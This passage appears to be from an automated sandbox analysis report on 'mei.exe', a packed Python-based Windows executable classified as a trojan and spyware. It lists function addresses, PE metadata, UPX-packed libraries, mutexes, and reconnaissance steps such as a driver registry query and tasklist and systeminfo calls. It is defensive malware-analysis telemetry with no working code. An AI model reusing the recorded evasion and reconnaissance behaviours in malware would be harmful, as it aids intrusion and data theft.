              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D7A002A4
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D7A11314
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79C42E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79E7244
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79CF24C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79DE21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D7A12268
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D7A081CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D7A02164
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79E0104
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D7A200F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79F8040
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79D3030
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79EC05C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79F0074
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79FC00C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D7A2DFD8
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D7A04FE8
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79F5F4C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D7A2AF90
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D7A0EEA4
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79C9EFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79FAF0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D7A0AE50
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79CCE84
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D7A1FE74
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79D8E68
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D7A11DCC
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79D1E04
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79CEE08
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79F0D20
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D7A09D74
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79CDD04
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D7A16D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79E9D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79D8C30
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D7A05C8C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D7A19B98
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D7A04B38
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D7A2AAC0
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79CCB14
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D7A05A70
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79FFA6C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79C49B8
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D7A069FD
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79FD91C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe | Code function: 89_2_00007FF7D79ED97C
              Source: C:\Users\user\Desktop\mei.exeCode function: String function: 00007FF6313D2AD0 appears 47 times
              Source: C:\Users\user\Desktop\mei.exeCode function: String function: 00007FFDFF1BFEC0 appears 38 times
              Source: C:\Users\user\Desktop\mei.exeCode function: String function: 00007FFDFF198E10 appears 128 times
              Source: C:\Users\user\Desktop\mei.exeCode function: String function: 00007FFE0038CDA1 appears 923 times
              Source: C:\Users\user\Desktop\mei.exeCode function: String function: 00007FFE0038D551 appears 58 times
              Source: C:\Users\user\Desktop\mei.exeCode function: String function: 00007FFE0038CE79 appears 33 times
              Source: C:\Users\user\Desktop\mei.exeCode function: String function: 00007FFE0038D545 appears 35 times
              Source: C:\Users\user\Desktop\mei.exeCode function: String function: 00007FFDFF199D60 appears 155 times
              Source: C:\Users\user\Desktop\mei.exeCode function: String function: 00007FFE0031132A appears 367 times
              Source: C:\Users\user\Desktop\mei.exeCode function: String function: 00007FFDFF198C40 appears 31 times
              Source: C:\Users\user\Desktop\mei.exeCode function: String function: 00007FFE0038CD8F appears 251 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: String function: 00007FF7D7A049F4 appears 53 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: String function: 00007FF7D79D8444 appears 48 times
              Source: mei.exeStatic PE information: invalid certificate
              Source: rar.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: api-ms-win-core-processenvironment-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-interlocked-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-util-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-stdio-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-processthreads-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-errorhandling-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-console-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-process-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-synch-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-timezone-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-file-l2-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-debug-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-string-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-handle-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-synch-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-profile-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-localization-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-datetime-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-math-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-locale-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-time-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-fibers-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-processthreads-l1-1-1.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-utility-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-namedpipe-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-filesystem-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-file-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-conio-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-heap-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-convert-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-runtime-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-string-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-file-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-memory-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-sysinfo-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-libraryloader-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-heap-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-environment-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: mei.exeBinary or memory string: OriginalFilename vs mei.exe
              Source: mei.exe, 00000000.00000003.1651565231.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1650171485.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1652833619.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1648446190.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs mei.exe
              Source: mei.exe, 00000000.00000003.1653171249.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1653792602.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1657110150.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs mei.exe
              Source: mei.exe, 00000000.00000003.1653909478.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1652913404.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1649250703.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1647712678.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs mei.exe
              Source: mei.exe, 00000000.00000003.1652445454.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1651785937.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1651965508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1651444604.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1657526057.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1647838508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs mei.exe
              Source: mei.exe, 00000000.00000000.1647251491.00007FF631412000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameosk.exej% vs mei.exe
              Source: mei.exe, 00000000.00000003.1649061865.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1652281017.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1653004204.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1653504776.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1651287443.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1656980860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs mei.exe
              Source: mei.exe, 00000000.00000003.1647535631.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs mei.exe
              Source: mei.exe, 00000000.00000003.1653247212.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1650835527.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1652354604.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1648318612.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs mei.exe
              Source: mei.exe, 00000000.00000003.1652658950.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1647965760.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs mei.exe
              Source: mei.exe, 00000000.00000003.1653092654.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1650338717.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1648120175.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs mei.exe
              Source: mei.exe, 00000000.00000003.1655571930.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs mei.exe
              Source: mei.exe, 00000000.00000003.1652173904.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1653415930.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1648204422.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs mei.exe
              Source: mei.exe, 00000000.00000003.1651679430.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1653329931.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1652071686.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1648931758.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1649338725.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1651868024.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1652543301.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1654133646.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1648569256.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs mei.exe
              Source: mei.exe, 00000000.00000003.1649158066.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1648688899.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs mei.exe
              Source: mei.exe, 00000000.00000003.1651177435.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1649574507.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1657827299.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs mei.exe
              Source: mei.exe, 00000000.00000003.1652750361.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1654022915.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1648814033.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000001.00000002.2041705452.00007FFE1026C000.00000004.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs mei.exe
              Source: mei.exe, 00000001.00000002.2042372458.00007FFE11EE2000.00000004.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs mei.exe
              Source: mei.exe, 00000001.00000002.2043335080.00007FFE1A467000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs mei.exe
              Source: mei.exe, 00000001.00000002.2037748628.00007FF631412000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameosk.exej% vs mei.exe
              Source: mei.exe, 00000001.00000002.2042727147.00007FFE130CC000.00000004.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs mei.exe
              Source: mei.exe, 00000001.00000002.2040257521.00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs mei.exe
              Source: mei.exe, 00000001.00000002.2042548840.00007FFE12E1C000.00000004.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs mei.exe
              Source: mei.exe, 00000001.00000002.2041231077.00007FFE0EB62000.00000004.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs mei.exe
              Source: mei.exe, 00000001.00000002.2040591479.00007FFE003D8000.00000004.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilenamelibsslH vs mei.exe
              Source: mei.exe, 00000001.00000002.2039946476.00007FFDFB89B000.00000004.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamepython311.dll. vs mei.exe
              Source: mei.exe, 00000001.00000002.2040814133.00007FFE00812000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs mei.exe
              Source: mei.exe, 00000001.00000002.2038180876.00007FFDFAD8B000.00000004.00000001.01000000.00000014.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs mei.exe
              Source: mei.exe, 00000001.00000002.2041445670.00007FFE101E3000.00000004.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs mei.exe
              Source: mei.exe, 00000001.00000002.2041984665.00007FFE10318000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs mei.exe
              Source: mei.exe, 00000001.00000002.2041036695.00007FFE0E182000.00000004.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs mei.exe
              Source: mei.exe, 00000001.00000002.2039113179.00007FFDFB289000.00000004.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs mei.exe
              Source: mei.exe, 00000001.00000002.2042164190.00007FFE11EB8000.00000004.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs mei.exe
              Source: C:\Users\user\Desktop\mei.exeSection loaded: python3.dll
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: libcrypto-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9989650991958289
              Source: libssl-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9923451741536459
              Source: python311.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9992887181541107
              Source: sqlite3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9971625026106934
              Source: unicodedata.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9942873714221825
              Source: classification engineClassification label: mal100.troj.adwa.spyw.expl.evad.winEXE@174/116@3/2
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313D8510 GetLastError,FormatMessageW,WideCharToMultiByte,0_2_00007FF6313D8510
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A0B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,89_2_00007FF7D7A0B57C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79DEF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,89_2_00007FF7D79DEF50
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79E3144 GetDiskFreeSpaceExW,89_2_00007FF7D79E3144
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7572:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8488:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8024:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8716:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7948:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8528:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7976:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8800:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5500:120:WilError_03
              Source: C:\Users\user\Desktop\mei.exeMutant created: \Sessions\1\BaseNamedObjects\W
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8056:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7836:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9112:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7660:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8876:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8960:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7740:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8540:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7944:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7656:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7520:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8132:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8108:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8148:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7544:120:WilError_03
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682
              Source: mei.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
